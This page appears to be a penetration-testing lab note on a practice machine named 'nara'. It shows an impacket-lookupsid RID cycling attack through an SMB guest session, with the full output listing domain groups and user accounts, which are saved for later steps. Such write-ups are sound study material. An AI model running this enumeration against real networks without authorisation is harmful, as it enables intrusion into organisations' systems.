InfoSec LAB

nara_RID_Cycling

Created: 2 min read

RID Cycling Attack

The target SMB server on the nara.nara-security.com(192.168.209.30) host, allows guest session with read access to the IPC$ share. This would mean that RID Cycling attack can be employed to bruteforce user’s RIDs.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ impacket-lookupsid blah@$IP 1000000
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
Password:
[*] Brute forcing SIDs at 192.168.209.30
[*] StringBinding ncacn_np:192.168.209.30[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-914744703-3800712539-3320214069
498: NARASEC\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: NARASEC\Administrator (SidTypeUser)
501: NARASEC\Guest (SidTypeUser)
502: NARASEC\krbtgt (SidTypeUser)
512: NARASEC\Domain Admins (SidTypeGroup)
513: NARASEC\Domain Users (SidTypeGroup)
514: NARASEC\Domain Guests (SidTypeGroup)
515: NARASEC\Domain Computers (SidTypeGroup)
516: NARASEC\Domain Controllers (SidTypeGroup)
517: NARASEC\Cert Publishers (SidTypeAlias)
518: NARASEC\Schema Admins (SidTypeGroup)
519: NARASEC\Enterprise Admins (SidTypeGroup)
520: NARASEC\Group Policy Creator Owners (SidTypeGroup)
521: NARASEC\Read-only Domain Controllers (SidTypeGroup)
522: NARASEC\Cloneable Domain Controllers (SidTypeGroup)
525: NARASEC\Protected Users (SidTypeGroup)
526: NARASEC\Key Admins (SidTypeGroup)
527: NARASEC\Enterprise Key Admins (SidTypeGroup)
553: NARASEC\RAS and IAS Servers (SidTypeAlias)
571: NARASEC\Allowed RODC Password Replication Group (SidTypeAlias)
572: NARASEC\Denied RODC Password Replication Group (SidTypeAlias)
1000: NARASEC\NARA$ (SidTypeUser)
1101: NARASEC\DnsAdmins (SidTypeAlias)
1102: NARASEC\DnsUpdateProxy (SidTypeGroup)
1103: NARASEC\staff (SidTypeGroup)
1104: NARASEC\Amelia.O'Brien (SidTypeUser)
1105: NARASEC\Damian.Johnson (SidTypeUser)
1106: NARASEC\Helen.Robinson (SidTypeUser)
1107: NARASEC\Sara.O'Sullivan (SidTypeUser)
1108: NARASEC\Jasmine.Roberts (SidTypeUser)
1109: NARASEC\Declan.Reynolds (SidTypeUser)
1110: NARASEC\Jodie.Summers (SidTypeUser)
1111: NARASEC\Carolyn.Hill (SidTypeUser)
1112: NARASEC\Jemma.Humphries (SidTypeUser)
1113: NARASEC\Tracy.White (SidTypeUser)
1115: NARASEC\Remote Access (SidTypeGroup)
1116: NARASEC\Enrollment (SidTypeGroup)

Performing the RID Cycling attack with an arbitrary credential against the target SMB service; blahblah The following domain users have been identified;

  • Administrator
  • Guest
  • krbtgt
  • NARA$
  • Amelia.O'Brien
  • Damian.Johnson
  • Helen.Robinson
  • Sara.O'Sullivan
  • Jasmine.Roberts
  • Declan.Reynolds
  • Jodie.Summers
  • Carolyn.Hill
  • Jemma.Humphries
  • Tracy.White

Saved into the domain_users.txt file.

Interactive Graph View

Backlinks